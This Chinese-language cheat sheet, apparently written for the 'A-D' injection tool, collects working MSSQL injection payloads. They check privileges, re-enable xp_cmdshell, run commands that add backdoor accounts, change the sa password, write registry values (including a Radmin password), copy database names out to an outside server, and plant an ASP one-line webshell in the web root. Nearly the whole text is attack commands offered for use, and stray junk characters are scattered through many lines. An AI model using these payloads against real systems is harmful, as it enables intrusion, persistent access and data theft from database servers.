阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
8 w2 C) c) z8 Q: \and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
, b3 _* L( {" c
7 T1 E+ a8 A  p' b& G//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 w$ s; ~5 V  D2 @4 E& V" k9 U
! l2 y7 l: q: i3 T7 L* Y7 B5 ]- S
数字类型
and char(124)%2Buser%2Bchar(124)=0
. W5 K- Y2 l8 Q1 [
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 \8 l$ h& _/ ^" s' v
: }$ D1 _9 U0 m( }/ ]搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
* D4 C8 r6 y6 @# k# l9 M' ]' and user>0 and ''='
* G( v  e: W4 J1 j
检测是否为SA权限
9 s* H+ Z# F3 l9 Q# c. M2 Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
4 \. V5 N8 r4 L, ?: IAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- |& G1 l3 N7 [7 N( H; R
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--
8 `" H' G+ {6 l% o9 ~
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
& I/ \& x  ~, ]/ D6 E9 n

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! }, j0 W4 \" S1 X
+ a. d1 i4 m3 n7 c& t; t//-----------------------
//      执行命令
//-----------------------
" \3 X' j/ j+ o, ~: s: C4 f首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  W5 u+ O, S1 |4 c, M- o, J
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
! P. n, ^8 W# p1 U: y$ x+ N;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 c0 Y3 C1 V. s8 d; q7 Q- W* ?
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

0 Z0 z4 F, N5 ^( ?" s判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

$ @8 c, {/ @7 ^4 }! b写注册表
4 b( o$ @' g3 ^( c, F& {1 ?4 `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

3 e6 i$ S$ T4 ?* X* K( xREG_SZ

! j; j" L) U' W) P读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

* M$ L0 T/ Y3 j+ p! _读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
* Q7 N& T: n5 g, x: v+ c) a

& l' T- p+ J+ P5 R# W# e数据库备份
backup database pubs to disk = 'c:\123.bak'
/ B* Y; E# X& b6 \7 ~
' E6 @2 w6 e4 Q1 W( \& T//爆出长度
, K( r3 S3 o7 f4 t3 IAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& _& f, X! n! y8 C  o9 v8 t* ^
) N5 V" u' H" B; c
6 k/ @5 Y& J  n
更改sa口令方法：用sql综合利用工具连接后，执行命令：
+ `! A5 M9 {: ?8 d( n& E' m6 }# Aexec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
" A, m4 L$ ~9 V: qexec master.dbo.sp_addlogin test,ptlove
; Y+ g  w/ e$ aexec master.dbo.sp_addsrvrolemember test,sysadmin

7 @) W. o  q' l8 H删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

) R( W( I. r3 O6 ?添加扩展存储过过程
; z: ~0 A) I: ], ^EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. I' P* K/ C+ \0 e9 X! AGRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。
7 u; |) K# W$ m
* u& ?+ ]% p1 N$ @' zexec master..xp_servicecontrol 'stop','schedule'
7 X  C' U% c% J; T% hexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs
6 [% o6 i5 Y: m/ F: I
$ D/ b. Z3 q8 M+ A只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

  g' O  r- Q7 b( g2 p, ndbo.xp_makecab
8 J, q/ p% u" y  \5 B/ w9 ^
8 u. F* M$ A1 o1 t6 c1 ]将目标多个档案压缩到某个目标档案之内。
& ?7 V& p/ q% N% C! H# I所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
6 j( X0 \$ b8 x) T
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ R; ]) D& O+ i! W6 E# X4 g9 e4 l
; \( p. D' G. G" n) sxp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

; d9 z0 u+ `: w5 ~+ f. S# g: m% Mxp_terminate_process 2484

xp_unpackcab

解开压缩档。
* P' `- k  d( z0 v$ ^; x
9 t; K9 T* n! U% \xp_unpackcab 'c:\test.cab','c:\temp',1

8 q6 t. k2 Z! o! d; q+ C
9 J+ X! N/ z1 `. x某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 j* e* Y2 J# W+ {
create database lcx;
( h) K- V, E1 ^" fCreate TABLE ku(name nvarchar(256) null);
; U# D/ X4 A7 ~: Y3 |+ I4 yCreate TABLE biao(id int NULL,name nvarchar(256) null);
& }9 k* G2 c9 @  a9 u! O4 K7 ^
//得到数据库名
8 b- ]& j. t2 U  y$ d" ]$ [8 rinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

1 q1 L; A. ^  j4 U5 X
7 \# O2 K  i+ _* \//在Master中创建表，看看权限怎样
/ k  N5 I6 X6 v+ NCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
. y' M: F& M/ e2 _% ^' z- l% V
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
. j1 b2 l, e/ c* S: V4 ~& O& E
+ y) j9 w  j8 ^, g- y+ b4 G//删除内容
delete from table_name where Stockid = 3